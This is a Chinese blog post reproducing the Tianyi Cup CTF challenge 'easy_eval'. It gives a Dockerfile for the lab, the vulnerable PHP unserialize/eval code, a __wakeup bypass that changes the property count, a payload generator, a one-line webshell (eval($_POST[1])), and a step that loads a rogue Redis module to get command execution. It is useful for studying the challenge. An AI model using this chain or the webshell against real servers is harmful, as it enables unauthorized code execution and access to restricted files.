天翼杯easy_eval复现
Posted 一睡12点
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了天翼杯easy_eval复现相关的知识,希望对你有一定的参考价值。
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。
本地环境的搭建
本地环境涉及到php的web服务、redis数据库。
Dockerfile的编写
FROM ubuntu:16.04
COPY src/sources.list /etc/apt/sources.list
COPY src/redis-4.0.9 /home/redis-4.0.9
RUN apt-get update && \\
apt-get install -y curl \\
software-properties-common \\
python3-software-properties \\
python-software-properties \\
unzip \\
vim
RUN apt-get install -y apache2
RUN service apache2 restart
RUN locale -a
RUN export LANG=C.UTF-8 && \\
add-apt-repository ppa:ondrej/php && \\
apt-get update
RUN apt-get install -y libapache2-mod-php7.0 \\
libzend-framework-php \\
php7.0-cli \\
php7.0 \\
php7.0-bcmath \\
php7.0-bz2 \\
php7.0-cgi \\
php7.0-common \\
php7.0-fpm \\
php7.0-gmp \\
php-http \\
php-imagick \\
php7.0-intl \\
php7.0-json \\
php7.0-mbstring \\
php-memcache \\
php-memcached \\
php7.0-mysql \\
php7.0-recode \\
php7.0-gd \\
php7.0-mcrypt \\
php7.0-xml \\
php7.0-pdo \\
php7.0-opcache \\
php7.0-curl \\
php7.0-zip
RUN apt install -y gcc \\
make
RUN cd /home/redis-4.0.9 &&\\
cp -r /home/redis-4.0.9 /usr/local/redis &&\\
cd /usr/local/redis &&\\
make && make PREFIX=/usr/local/redis install &&\\
export REDIS_HOME=/usr/local/redis &&\\
export PATH=$PATH:$REDIS_HOME/bin
COPY src /tmp/src
RUN mv /tmp/src/web.ini /etc/php/7.0/apache2/conf.d/php.ini &&\\
rm -rf /var/www/html &&\\
mv /tmp/src/html /var/www/html &&\\
mv /tmp/src/start.sh /start.sh &&\\
chmod +x /start.sh
EXPOSE 80
CMD ["/start.sh"]
按照流程编写docker-compose.yml文件,并将相应的文件放到src目录下
其中web.ini就是php的配置文件,可以在里面设置disable_function等。至此,题目基本搭建完成。
反序列化执行eval语句
访问web服务,看到如下php代码
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
这里需要触发A类里面的eval函数,才可以进行命令执行。通过unserialize反序列化,触发__destruct函数。由于这里的destruct函数可以将$this->a作为对象来执行a()函数,所以这里可以触发 __call方法。但需要注意的是__wakeup函数会在这个类初始化之前触发。如果等这个函数触发之后,再去执行我们得call方法,那么code变量就是一个空字符串了,无法达到我们想要的效果。
绕过wakeup,需要属性数量和实际属性数量不相同。同样这里有正则
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
如果按照以下方式编写payload是无法通过正则的
<?php
class A{
public $code = 'phpinfo();';
}
class B{
public $a;
}
$b = new B();
$b->a = new A();
echo serialize($b);
这里要求A或B这两个字符后面跟随的数字是1,否则就会退出程序。
这里只需要在B这个类的后面再添加一个属性,这样B的属性数量变为2,反序列化时将B的属性数量改为1,即可绕过wakeup函数。
这样一来,就成功执行phpinfo函数。
redis加载恶意so文件
将上面的phpinfo();函数改为一句话木马eval($_POST[1]);使用蚁剑连接
接下来使用数据操作功能连接上redis
可以看到版本号是4.0.9,使用https://github.com/Dliv3/redis-rogue-server上的so文件。redis加载该文件,即可完成命令执行,访问到被限制访问的文件。
以上是关于天翼杯easy_eval复现的主要内容,如果未能解决你的问题,请参考以下文章